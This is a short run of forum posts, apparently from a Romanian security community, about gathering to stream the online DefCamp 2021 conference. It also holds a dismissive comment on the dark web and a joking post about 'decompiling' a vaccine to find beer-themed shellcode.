  18. Shall we get together somewhere to drink and do some streaming? The condition would be that we all have tickets. @Andrei ?
  19. The number of cases is dropping; isn't anything being done in person too?
  20. Nytro

    Deep/dark web

    You'd be better off asking around in hospitals if that's the kind of thing you're after...
  21. Nytro

    Deep/dark web

    Hi, to me it seems like a load of garbage. Sure, you may have better odds of finding who-knows-what drugs or other junk there, but beyond that it's useless. I'm waiting for some differing opinions too, maybe I'm wrong. As for "hacking", I only found 30-year-old trash, seemingly written by 12-year-olds during their CS:GO breaks.
  22. We could rent a bar or something, with a TV, stream from there and drink.
  23. DefCamp 2021 will move fully ONLINE https://def.camp/defcamp-2021-will-move-fully-online/
  24. I'm vaccinated and nothing happened to me. I got vaccinated because I decompiled the vaccine in IDA Pro and saw what's inside. It opens a port for beer and runs an obfuscated shellcode for the urge to drink. Based on heuristic static analysis performed on the messenger RNA, we can suspect that the Corona company is behind this vaccine.